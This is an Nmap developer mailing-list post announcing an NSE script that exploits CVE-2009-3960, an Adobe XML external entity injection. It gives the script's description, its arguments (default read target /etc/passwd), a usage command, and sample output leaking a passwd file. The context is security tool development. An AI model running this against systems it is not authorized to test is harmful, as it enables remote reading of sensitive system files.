Nmap Development mailing list archives
[NSE] http-cve-2009-3960 (Adobe XML External Entity Injection)
From: Hani Benhabiles <kroosec () gmail com>
Date: Sat, 31 Dec 2011 15:47:06 +0100
Hi list, description = [[ Exploits cve-2009-3960 also known as Adobe XML External Entity Injection. This vulnerability permits to read local files remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0 For more information see: * http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf * http://www.osvdb.org/62292 * Metasploit module: auxiliary/scanner/http/adobe_xml_inject ]] --- -- @args http-cve-2009-3960.root Points to the root path. Defaults to "/" -- @args http-cve-2009-3960.readfile target file to be read. Defaults to "/etc/passwd" -- -- @usage -- nmap --script=http-cve-2009-3960 --script-arg http-http-cve-2009-3960.root="/root/" <target> -- --@output -- PORT STATE SERVICE -- 80/tcp open http --| http-cve-2009-3960: --| samples/messagebroker/http --| <?xml version="1.0" encoding="utf-8"?> --| <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string> [...] root:x:0:0:root:/root:/bin/bash --| bin:*:1:1:bin:/bin:/sbin/nologin --| daemon:*:2:2:daemon:/sbin:/sbin/nologin --| adm:*:3:4:adm:/var/adm:/sbin/nologin --| lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin --| sync:*:5:0:sync:/sbin:/bin/sync --| shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown --| halt:*:7:0:halt:/sbin:/sbin/halt --| mail:*:8:12:mail:/var/spool/mail:/sbin/nologin --| news:*:9:13:news:/etc/news: --| uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin --| operator:*:11:0:operator:/root:/sbin/nologin --| games:*:12:100:games:/usr/games:/sbin/nologin --| gopher:*:13:30:gopher:/var/gopher:/sbin/nologin --| ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin --| nobody:*:99:99:Nobody:/:/sbin/nologin --| nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin --| vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin --| pcap:!!:77:77::/var/arpwatch:/sbin/nologin --| mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin --| [...] --|_ Cheers, Hani -- M. Hani Benhabiles OWASP Algeria SC founder and president. Blog: http://kroosec.blogspot.com Twitter: kroosec <https://twitter.com/#%21/kroosec>
Attachment:
http-cve-2009-3960.nse
Description:
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Dec 31)